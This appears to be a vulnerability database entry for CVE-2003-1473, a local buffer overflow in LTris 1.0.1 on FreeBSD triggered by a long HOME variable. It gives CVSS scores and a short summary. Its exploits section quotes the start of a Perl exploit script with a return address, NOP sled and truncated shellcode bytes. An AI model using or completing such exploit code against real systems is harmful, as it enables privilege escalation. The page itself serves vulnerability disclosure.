4.6
CVSSv2

CVE-2003-1473

Published: 31/12/2003 Updated: 29/07/2017
CVSS v2 Base Score: 4.6 | Impact Score: 6.4 | Exploitability Score: 3.9
VMScore: 465
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in LTris 1.0.1 of FreeBSD Ports Collection 2003-02-25 and previous versions allows local users to execute arbitrary code with gid "games" permission via a long HOME environment variable.

Vulnerable Product Search on Vulmon Subscribe to Product

lgames ltris 1.0.1

Exploits

source: wwwsecurityfocuscom/bid/7537/info A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges #!/usr/bin/perl $len = 520; $ret = 0xbfbff825; $nop = "\x90"; $offset = 0; $shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56" #freebsd 29 bytes ...